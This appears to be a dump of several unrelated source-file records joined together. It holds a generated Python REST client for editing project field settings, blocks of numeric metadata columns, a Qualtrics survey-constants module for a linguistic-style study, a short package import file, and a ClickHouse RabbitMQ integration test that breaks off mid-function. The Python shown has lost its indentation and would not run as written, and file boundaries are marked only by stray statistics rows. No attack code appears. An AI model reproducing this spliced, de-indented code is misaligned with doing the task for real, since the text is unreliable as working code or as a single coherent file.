def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def edit_system_field(self, project_id, field_id, body, object_type, **kwargs):
"""
Edit System Field of an Object Type by the field
To edit System Field of an Object Type by the field
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.edit_system_field(project_id, field_id, body, object_type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param int field_id: ID of the field. (required)
:param FieldResource body: Given resource to edit a system field. (required)
:param str object_type: The object type. (required)
:return: FieldResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.edit_system_field_with_http_info(project_id, field_id, body, object_type, **kwargs)
else:
(data) = self.edit_system_field_with_http_info(project_id, field_id, body, object_type, **kwargs)
return data
def edit_system_field_with_http_info(self, project_id, field_id, body, object_type, **kwargs):
"""
Edit System Field of an Object Type by the field
To edit System Field of an Object Type by the field
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.edit_system_field_with_http_info(project_id, field_id, body, object_type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param int field_id: ID of the field. (required)
:param FieldResource body: Given resource to edit a system field. (required)
:param str object_type: The object type. (required)
:return: FieldResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'field_id', 'body', 'object_type']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method edit_system_field" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params) or (params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `edit_system_field`")
# verify the required parameter 'field_id' is set
if ('field_id' not in params) or (params['field_id'] is None):
raise ValueError("Missing the required parameter `field_id` when calling `edit_system_field`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `edit_system_field`")
# verify the required parameter 'object_type' is set
if ('object_type' not in params) or (params['object_type'] is None):
raise ValueError("Missing the required parameter `object_type` when calling `edit_system_field`")
collection_formats = {}
resource_path = '/api/v3/projects/{projectId}/settings/{objectType}/system-fields/{fieldId}'.replace('{format}', 'json')
path_params = {}
if 'project_id' in params:
path_params['projectId'] = params['project_id']
if 'field_id' in params:
path_params['fieldId'] = params['field_id']
if 'object_type' in params:
path_params['objectType'] = params['object_type']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['Authorization']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FieldResource',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_custom_field(self, project_id, object_type, body, **kwargs):
"""
field.updateCustomField
Update active or inactive custom fields of an Object Type
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_custom_field(project_id, object_type, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str object_type: The object type (required)
:param list[FieldResource] body: Given resource to update custom fields. (required)
:return: list[FieldResource]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_custom_field_with_http_info(project_id, object_type, body, **kwargs)
else:
(data) = self.update_custom_field_with_http_info(project_id, object_type, body, **kwargs)
return data
def update_custom_field_with_http_info(self, project_id, object_type, body, **kwargs):
"""
field.updateCustomField
Update active or inactive custom fields of an Object Type
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_custom_field_with_http_info(project_id, object_type, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str object_type: The object type (required)
:param list[FieldResource] body: Given resource to update custom fields. (required)
:return: list[FieldResource]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'object_type', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_custom_field" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params) or (params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `update_custom_field`")
# verify the required parameter 'object_type' is set
if ('object_type' not in params) or (params['object_type'] is None):
raise ValueError("Missing the required parameter `object_type` when calling `update_custom_field`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_custom_field`")
collection_formats = {}
resource_path = '/api/v3/projects/{projectId}/settings/{objectType}/custom-fields/active'.replace('{format}', 'json')
path_params = {}
if 'project_id' in params:
path_params['projectId'] = params['project_id']
if 'object_type' in params:
path_params['objectType'] = params['object_type']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['Authorization']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[FieldResource]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 45.610909
| 129
| 0.586223
| 1,369
| 12,543
| 5.156318
| 0.121256
| 0.056665
| 0.031874
| 0.020399
| 0.913869
| 0.895878
| 0.889786
| 0.871228
| 0.863862
| 0.851962
| 0
| 0.002035
| 0.334131
| 12,543
| 274
| 130
| 45.777372
| 0.843151
| 0.332456
| 0
| 0.679104
| 1
| 0
| 0.210839
| 0.045834
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037313
| false
| 0
| 0.052239
| 0
| 0.141791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5ab7d2c082c9b1d493376b713180d70763ae1ac4
| 12,598
|
py
|
Python
|
src/utility/qualtrics_constants.py
|
nlpsoc/STEL
|
572ff12efad83ba3e106165218091aef7ccf6ce1
|
[
"MIT"
] | 2
|
2021-12-05T08:43:32.000Z
|
2021-12-17T14:08:01.000Z
|
src/utility/qualtrics_constants.py
|
nlpsoc/STEL
|
572ff12efad83ba3e106165218091aef7ccf6ce1
|
[
"MIT"
] | null | null | null |
src/utility/qualtrics_constants.py
|
nlpsoc/STEL
|
572ff12efad83ba3e106165218091aef7ccf6ce1
|
[
"MIT"
] | null | null | null |
prolific_msg = "<div>Before you start, please switch off phone/ e-mail/ music so you can focus on this study." \
"</div><br>Thank you!<br><br>Please enter your Prolific ID here:"
consent_msg = "<div>In this study, we do not collect any sensitive data from you. " \
"The only personalized data we save is your prolific id. " \
"We will only make use of the id for communication with you within the prolific platform. " \
"However, your responses (without the prolific id) will be used for research " \
"and can be distributed publicly.<br><br>Do you consent to this?<br></div>"
consent_choices = ['Yes, begin with the study.', 'No, take me back.']
triple_task_description = 'Dear Survey Taker,<br><div><br>' \
'Thank you for taking part in this survey about linguistic style comparisons.<br><br>' \
'<br></div><div><br></div><div>----------------------------------------------------------------------------------------------------<br></div><br>' \
'<div>In this study, you will be expected to complete the following task:' \
'<br><br><strong> Compare the linguistic style of text snippets. </strong><br>' \
'<br>Opposed to content, <strong>style is not about "what" is said but about "how" it is said.</strong><br>' \
'<br>The survey will take place in the form of multiple choice questions of the same setup. ' \
'An example could be:</div><div><br><p><strong> Question</strong>: ' \
'Given the text snippet <br></p><p><br></p><p><strong> ' \
'It reminds me of an old song from the Beatles.</strong> <br></p><p><br></p><p> ' \
'which of the following is more consistent in linguistic style?</p><p>' \
'</p><p><br></p><p><strong> ' \
'Alternative A</strong>: KEVIN n nfnhfnigbubjbni.....I dunt really watch American Idol..........<br> <strong> ' \
'Alternative B</strong>: Kevin, I am not exactly an \'American Idol\' viewer.</p><br>' \
'Here, alternative B is more consistent in style as alternative A is noticeably ' \
'more informal (e.g., \'nfnhf\' or \'dunt really\') than the other two text snippets. ' \
'<br></div><div><br>Another example could be:</div><div><br><p><strong> Question</strong>: ' \
'Given the text snippet <br></p><p><br></p><p><strong> ' \
'This stamp became the standard for the remnant of Victoria\'s reign, ' \
'and vast quantities were printed.</strong> <br></p><p><br></p><p> ' \
'which of the following is more consistent in linguistic style?</p><p>' \
'</p><p><br></p><p><strong> ' \
'Alternative A</strong>: Both names became defunct in 2007 when they were merged into The National Museum of Scotland.<br> <strong> ' \
'Alternative B</strong>: Both names stopped being used in 2007 when they became a part of The National Museum of Scotland.</p><br>' \
'Here, alternative A is more consistent in style as alternative B is noticeably less complex ' \
'(e.g., \'stopped being used\' instead of \'became defunct\') than the other two text snippets. ' \
'<br></div><div><br>The examples in the survey might be quite hard. ' \
'In case you can not find a good reasoning for which alternative is more consistent in style, ' \
'<strong>try to compare and find the differences between alternative A and alternative B</strong>. ' \
'</div><div><br>In this survey, you will need different amounts of time to answer the questions. ' \
'On average you should take about 20 seconds per question. ' \
'You will see a total of 16 questions in this survey, which should take you about 6 minutes.<br></div>'
quadruple_task_description = "<div>Dear Survey Taker,</div><div><br>Thank you for taking part in this survey about linguistic style comparisons.<br> </div><div>----------------------------------------------------------------------------------------------------</div><div> </div> In this study, you will be expected to complete the following task:<br><br> <strong>Compare the linguistic style of text snippets.</strong> <br><br>Opposed to content, <strong>style is not about \"what\" is said but about \"how\" it is said</strong>.<br><br>The survey will take place in the form of ranking questions of the same setup. An example could be:<br> <br><br> <strong>Question:</strong> Given the text snippets <br><br> <strong>1. It reminds me of an old song from the Beatles.</strong><br> <strong>2. Reminds me of an old beatles song... cant remember which one tho.</strong><br><br> rank the following text snippets to match the given order (1. then 2.) with respect to linguistic style.<br><br> <strong>Alternative A:</strong> KEVIN n nfnhfnigbubjbni.....I dunt really watch American Idol..........<br> <strong>Alternative B:</strong> Kevin, I am not exactly an 'American Idol' viewer.<br><br><br>" \
"Here, alternative B is more formal than alternative A (e.g., 'nfnhf' or 'dunt really' in A). " \
"We can also see that text snippet 1 is more formal than text snippet 2 (e.g., snippet 2 contains 'tho' and 'cant'). " \
"As a result, the ordering that is most consistent with the text snippets is alternative B then alternative A. " \
"<br> " \
"<br><br>Another example could be:<br> <br> <strong>Question:</strong> Given the text snippets<br><br> <strong>1. This stamp remained the standard letter stamp for the remainder of Victoria's reign, and vast quantities were printed.</strong><br> <strong>2. This stamp stayed the standard letter stamp for the remainder of Victoria's reign, and a lot of them were printed.</strong><br><br> rank the following text snippets to match the given order (1. then 2.) with respect to linguistic style.<br> <br> <strong>Alternative A:</strong> Both names became defunct in 2007 when they were merged into The National Museum of Scotland.<br> <strong>Alternative B:</strong> Both names stopped being used in 2007 when they became a part of The National Museum of Scotland.<br><br> <br>" \
"Here, alternative A is phrased in a more complex style than alternative B (e.g., 'became defunct' instead of 'stopped being used'). " \
"We can also see that text snippet 1 is more complex than 2 (e.g., 'vast quantities' instead of 'a lot of them'). " \
"As a result, the ordering that is most consistent with the text snippets is alternative A then alternative B.<br> <br><br>The examples in the survey might be quite hard. In case you can not find a good reasoning for which ordering is more consistent in style, <strong>try to compare and find the differences between alternative A and alternative B and match them to differences in 1. and 2.</strong><br><br> " \
"In this survey, you will need different amounts of time to answer the questions. " \
"On average you should take about 40 seconds per question. " \
"You will see a total of 16 questions in this survey, which should take you about 11 minutes."
quadruple_id = 'QQ_{}-{}_{}-{}--{}' # 1. anchor1 id, 2. anchor2 id, 3. alternative1 id 4. alternative 2 id, 5. correct alternative
triple_q_format = '<div>Given the text snippet<br /><br /> <strong>{}</strong>' \
'<br /><br />which of the following is more consistent in linguistic style?'
quad_q_format = '<div>Given the text snippets </div><div> </div><div>' \
' ' \
'<strong>1.</strong> <strong>{}</strong> <br></div><div>' \
' ' \
'<strong>2.</strong> <strong>{}</strong><br> </div><div> ' \
'rank the following text snippets to match the given order (1. then 2.) with respect to linguistic style.</div>'
end_comment_msg = 'Thank you for your participation.<br><br>Do you have any comments?'
# triple_end_intro_ex_msg = "<div>Great. Thank you for completing the test round. On to the complex examples.<br>\n<br>\nSmall Note: Every time you submitted an answer, you will receive direct feedback in the form of our 'predicted' correct answer. This is to give you a general idea of your performance. <strong>However, our predicted answers might be wrong. In fact, we expect them to be wrong on several occasions.</strong> Do not take them too seriously.</div>"
triple_intro_ex_1 = {
"anchor": "Here, two points on a sphere are called antipodal if they're in exactly opposite directions from the sphere's center.",
"alternative_0": "In philosophy and logic, the classical liar paradox or liar's paradox or antinomy of the liar is the statement of a liar that he or she is lying: for instance, declaring that 'I am lying'",
"alternative_1": "In philosophy and logic, the classical liar paradox or liar's paradox or antinomy of the liar is the statement of a liar that he or she's lying: for instance, declaring that 'I am lying'",
"anchor_id": "i1_a",
"alternative_0_id": "i1_a0",
"alternative_1_id": "i1_a1",
"correct_msg": "the second option is more consistent in style as she's is a contraction just like they're in the original sentence. Everything else between the alternatives is the same.",
"wrong_msg": "the second option is more consistent in style as she's is a contraction just like they're in the original sentence. Everything else between the alternatives is the same."
}
triple_intro_ex_2 = {
"anchor": "It reminds me of an old song from the Beatles.",
"alternative_0": "KEVIN n nfnhfnigbubjbni.....I dunt really watch American Idol.......... ",
"alternative_1": "Kevin...I'm not exactly an 'American Idol' viewer.",
"anchor_id": "i2_a",
"alternative_0_id": "i2_a0",
"alternative_1_id": "i2_a1",
"correct_msg": "the second option is more consistent in style as the first option is noticeably more informal than the original sentence. Here you can see that the reasoning already becomes less 'concrete'.",
"wrong_msg": "the second option is more consistent in style as the first option is noticeably more informal than the original sentence. Here you can see that the reasoning already becomes less 'concrete'."
}
triple_intro_exs = [triple_intro_ex_1, triple_intro_ex_2]
EMBED_SCREENED_OUT = "Screened Out"
QID_PROLIFIC_PID = 'Q-welcome_prolific-id'
RESPONSE_TYPE_COL = "Q_Response_Type"
VALID_RESPONSE = "Valid"
| 134.021277
| 1,617
| 0.630418
| 1,846
| 12,598
| 4.265439
| 0.172264
| 0.2032
| 0.262129
| 0.300737
| 0.714757
| 0.699771
| 0.674879
| 0.665735
| 0.645669
| 0.629286
| 0
| 0.007844
| 0.220829
| 12,598
| 94
| 1,618
| 134.021277
| 0.794315
| 0.044134
| 0
| 0.091954
| 0
| 0.218391
| 0.812791
| 0.202824
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.022989
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5ad767d4fd762cffda9806b872cda44e89c20dd6
| 127
|
py
|
Python
|
straintables/__init__.py
|
Gab0/linkageMapper
|
549b292e5b6ab22e03373483cd27236aa2f635eb
|
[
"MIT"
] | null | null | null |
straintables/__init__.py
|
Gab0/linkageMapper
|
549b292e5b6ab22e03373483cd27236aa2f635eb
|
[
"MIT"
] | 1
|
2020-05-03T15:13:07.000Z
|
2020-05-04T03:01:59.000Z
|
straintables/__init__.py
|
Gab0/straintables
|
549b292e5b6ab22e03373483cd27236aa2f635eb
|
[
"MIT"
] | null | null | null |
from straintables import logo, Definitions
from straintables import skdistance
from straintables import InputFile, OutputFile
| 25.4
| 46
| 0.866142
| 14
| 127
| 7.857143
| 0.571429
| 0.436364
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11811
| 127
| 4
| 47
| 31.75
| 0.982143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
517ed81a979e26761466936b0de68adcae89b770
| 55,087
|
py
|
Python
|
tests/integration/test_storage_rabbitmq/test.py
|
em0t/ClickHouse
|
ff2d9aec1a141679c8b3ea231ab59962d740c8b4
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_storage_rabbitmq/test.py
|
em0t/ClickHouse
|
ff2d9aec1a141679c8b3ea231ab59962d740c8b4
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_storage_rabbitmq/test.py
|
em0t/ClickHouse
|
ff2d9aec1a141679c8b3ea231ab59962d740c8b4
|
[
"Apache-2.0"
] | null | null | null |
import os.path as p
import random
import threading
import time
import pytest
from random import randrange
import pika
from sys import getdefaultencoding
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
from helpers.client import QueryRuntimeException
from helpers.network import PartitionManager
import json
import subprocess
from google.protobuf.internal.encoder import _VarintBytes
# Single-node ClickHouse test cluster with a RabbitMQ side container.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
                                main_configs=['configs/rabbitmq.xml','configs/log_conf.xml'],
                                with_rabbitmq=True)
# Docker container id of the RabbitMQ broker; set by the rabbitmq_cluster fixture.
rabbitmq_id = ''
# Helpers
def check_rabbitmq_is_available():
    """Return True when ``rabbitmqctl await_startup`` succeeds inside the
    RabbitMQ container, i.e. the broker is ready to accept connections."""
    # Use a dedicated name: the original local `p` shadowed the module-level
    # `import os.path as p` alias.
    proc = subprocess.Popen(('docker',
                             'exec',
                             '-i',
                             rabbitmq_id,
                             'rabbitmqctl',
                             'await_startup'),
                            stdout=subprocess.PIPE)
    proc.communicate()
    return proc.returncode == 0
def enable_consistent_hash_plugin():
    """Enable the ``rabbitmq_consistent_hash_exchange`` plugin in the broker
    container; return True on success."""
    # Dedicated name instead of `p`, which would shadow `os.path as p`.
    proc = subprocess.Popen(('docker',
                             'exec',
                             '-i',
                             rabbitmq_id,
                             "rabbitmq-plugins", "enable", "rabbitmq_consistent_hash_exchange"),
                            stdout=subprocess.PIPE)
    proc.communicate()
    return proc.returncode == 0
def wait_rabbitmq_is_available(max_retries=50):
    """Poll the broker once per second until it responds.

    Raises:
        RuntimeError: if RabbitMQ is still unavailable after *max_retries* polls.
    """
    retries = 0
    while True:
        if check_rabbitmq_is_available():
            break
        retries += 1
        if retries > max_retries:
            # BUG FIX: `raise "..."` raises a TypeError in Python 3
            # (exceptions must derive from BaseException).
            raise RuntimeError("RabbitMQ is not available")
        print("Waiting for RabbitMQ to start up")
        time.sleep(1)
def wait_rabbitmq_plugin_enabled(max_retries=50):
    """Retry enabling the consistent-hash plugin once per second.

    Raises:
        RuntimeError: if the plugin cannot be enabled after *max_retries* tries.
    """
    retries = 0
    while True:
        if enable_consistent_hash_plugin():
            break
        retries += 1
        if retries > max_retries:
            # BUG FIX: raising a plain string is a TypeError in Python 3.
            raise RuntimeError("RabbitMQ plugin is not available")
        print("Waiting for plugin")
        time.sleep(1)
def rabbitmq_check_result(result, check=False, ref_file='test_rabbitmq_json.reference'):
    """Compare *result* with the reference TSV file next to this test.

    With ``check=True`` the comparison is asserted; otherwise the boolean
    outcome is returned so callers can poll until the data matches.
    """
    reference_path = p.join(p.dirname(__file__), ref_file)
    with open(reference_path) as reference:
        matches = TSV(result) == TSV(reference)
        if check:
            assert matches
        else:
            return matches
# Fixtures
@pytest.fixture(scope="module")
def rabbitmq_cluster():
    """Module-scoped fixture: start the cluster, record the RabbitMQ docker id
    in the module-level global, create the `test` database, and always shut
    the cluster down at module teardown."""
    try:
        global rabbitmq_id
        cluster.start()
        rabbitmq_id = instance.cluster.rabbitmq_docker_id
        print("rabbitmq_id is {}".format(rabbitmq_id))
        instance.query('CREATE DATABASE test')
        yield cluster
    finally:
        cluster.shutdown()
@pytest.fixture(autouse=True)
def rabbitmq_setup_teardown():
    """Per-test fixture: block until the broker and its plugin are up, then
    drop the shared `test.rabbitmq` table after each test."""
    wait_rabbitmq_is_available()
    wait_rabbitmq_plugin_enabled()
    print("RabbitMQ is available - running test")
    yield  # run test
    instance.query('DROP TABLE IF EXISTS test.rabbitmq')
# Tests
@pytest.mark.skip(reason="Flaky")
@pytest.mark.timeout(180)
def test_rabbitmq_select_from_new_syntax_table(rabbitmq_cluster):
    """Publish 50 JSON rows and read them back via SELECT on a table created
    with the SETTINGS-style (new) RabbitMQ engine syntax."""
    instance.query('''
        CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_routing_key_list = 'new',
                     rabbitmq_exchange_name = 'clickhouse-exchange',
                     rabbitmq_format = 'JSONEachRow',
                     rabbitmq_row_delimiter = '\\n';
        ''')
    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    connection = pika.BlockingConnection(parameters)
    channel = connection.channel()
    channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
    # First batch: keys 0..24.
    messages = []
    for i in range(25):
        messages.append(json.dumps({'key': i, 'value': i}))
    for message in messages:
        channel.basic_publish(exchange='clickhouse-exchange', routing_key='new', body=message)
    # Second batch: keys 25..49.
    messages = []
    for i in range(25, 50):
        messages.append(json.dumps({'key': i, 'value': i}))
    for message in messages:
        channel.basic_publish(exchange='clickhouse-exchange', routing_key='new', body=message)
    connection.close()
    # Poll until the accumulated SELECT output matches the reference file;
    # pytest's timeout mark bounds this loop.
    result = ''
    while True:
        result += instance.query('SELECT * FROM test.rabbitmq', ignore_error=True)
        if rabbitmq_check_result(result):
            break
    rabbitmq_check_result(result, True)
@pytest.mark.timeout(180)
def test_rabbitmq_select_from_old_syntax_table(rabbitmq_cluster):
    """Publish 50 JSON rows and read them back via SELECT on a table created
    with the positional-argument (old) RabbitMQ engine syntax."""
    instance.query('''
        CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
            ENGINE = RabbitMQ('rabbitmq1:5672', 'old', 'clickhouse-exchange', 'JSONEachRow', '\\n');
        ''')
    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    connection = pika.BlockingConnection(parameters)
    channel = connection.channel()
    channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
    messages = []
    for i in range(50):
        messages.append(json.dumps({'key': i, 'value': i}))
    for message in messages:
        channel.basic_publish(exchange='clickhouse-exchange', routing_key='old', body=message)
    connection.close()
    # Poll until all rows show up; bounded by the timeout mark.
    result = ''
    while True:
        result += instance.query('SELECT * FROM test.rabbitmq', ignore_error=True)
        if rabbitmq_check_result(result):
            break
    rabbitmq_check_result(result, True)
@pytest.mark.timeout(180)
def test_rabbitmq_select_empty(rabbitmq_cluster):
    """A SELECT from a RabbitMQ table with no published messages returns 0 rows."""
    instance.query('''
        CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_routing_key_list = 'empty',
                     rabbitmq_format = 'TSV',
                     rabbitmq_row_delimiter = '\\n';
        ''')
    assert int(instance.query('SELECT count() FROM test.rabbitmq')) == 0
@pytest.mark.timeout(180)
def test_rabbitmq_json_without_delimiter(rabbitmq_cluster):
    """JSONEachRow parsing must work when many newline-joined rows arrive in a
    single message body and no explicit row delimiter setting is given."""
    instance.query('''
        CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_routing_key_list = 'json',
                     rabbitmq_exchange_name = 'clickhouse-exchange',
                     rabbitmq_format = 'JSONEachRow'
        ''')
    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    connection = pika.BlockingConnection(parameters)
    channel = connection.channel()
    channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
    # 25 rows concatenated into ONE message body.
    messages = ''
    for i in range(25):
        messages += json.dumps({'key': i, 'value': i}) + '\n'
    all_messages = [messages]
    for message in all_messages:
        channel.basic_publish(exchange='clickhouse-exchange', routing_key='json', body=message)
    # Second single-body batch with rows 25..49.
    messages = ''
    for i in range(25, 50):
        messages += json.dumps({'key': i, 'value': i}) + '\n'
    all_messages = [messages]
    for message in all_messages:
        channel.basic_publish(exchange='clickhouse-exchange', routing_key='json', body=message)
    result = ''
    while True:
        result += instance.query('SELECT * FROM test.rabbitmq', ignore_error=True)
        if rabbitmq_check_result(result):
            break
    connection.close()
    rabbitmq_check_result(result, True)
@pytest.mark.timeout(180)
def test_rabbitmq_csv_with_delimiter(rabbitmq_cluster):
    """50 CSV-formatted messages must be ingested and match the reference."""
    instance.query('''
        CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_routing_key_list = 'csv',
                     rabbitmq_exchange_name = 'clickhouse-exchange',
                     rabbitmq_format = 'CSV',
                     rabbitmq_row_delimiter = '\\n';
        ''')
    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    connection = pika.BlockingConnection(parameters)
    channel = connection.channel()
    channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
    messages = []
    for i in range(50):
        messages.append('{i}, {i}'.format(i=i))
    for message in messages:
        channel.basic_publish(exchange='clickhouse-exchange', routing_key='csv', body=message)
    result = ''
    while True:
        result += instance.query('SELECT * FROM test.rabbitmq', ignore_error=True)
        if rabbitmq_check_result(result):
            break
    connection.close()
    rabbitmq_check_result(result, True)
@pytest.mark.skip(reason="Flaky")
@pytest.mark.timeout(180)
def test_rabbitmq_tsv_with_delimiter(rabbitmq_cluster):
    """50 TSV-formatted messages must be ingested and match the reference."""
    instance.query('''
        CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_routing_key_list = 'tsv',
                     rabbitmq_exchange_name = 'clickhouse-exchange',
                     rabbitmq_format = 'TSV',
                     rabbitmq_row_delimiter = '\\n';
        ''')
    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    connection = pika.BlockingConnection(parameters)
    channel = connection.channel()
    channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
    messages = []
    for i in range(50):
        messages.append('{i}\t{i}'.format(i=i))
    for message in messages:
        channel.basic_publish(exchange='clickhouse-exchange', routing_key='tsv', body=message)
    result = ''
    while True:
        result += instance.query('SELECT * FROM test.rabbitmq', ignore_error=True)
        if rabbitmq_check_result(result):
            break
    connection.close()
    rabbitmq_check_result(result, True)
@pytest.mark.timeout(180)
def test_rabbitmq_materialized_view(rabbitmq_cluster):
    """Messages published to RabbitMQ must flow through a materialized view
    into a MergeTree target table."""
    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_routing_key_list = 'mv',
                     rabbitmq_format = 'JSONEachRow',
                     rabbitmq_row_delimiter = '\\n';
        CREATE TABLE test.view (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.rabbitmq;
        ''')
    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    connection = pika.BlockingConnection(parameters)
    channel = connection.channel()
    messages = []
    for i in range(50):
        messages.append(json.dumps({'key': i, 'value': i}))
    for message in messages:
        channel.basic_publish(exchange='clickhouse-exchange', routing_key='mv', body=message)
    # Poll the target table until all rows arrived (bounded by the timeout mark).
    # Cleaned up: drop C-style `if (...)` parens and the stray `break;` semicolon.
    while True:
        result = instance.query('SELECT * FROM test.view')
        if rabbitmq_check_result(result):
            break
    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
        ''')
    connection.close()
    rabbitmq_check_result(result, True)
@pytest.mark.timeout(180)
def test_rabbitmq_materialized_view_with_subquery(rabbitmq_cluster):
    """Same as the plain MV test, but the view selects through a subquery."""
    instance.query('''
        DROP TABLE IF EXISTS test.view;
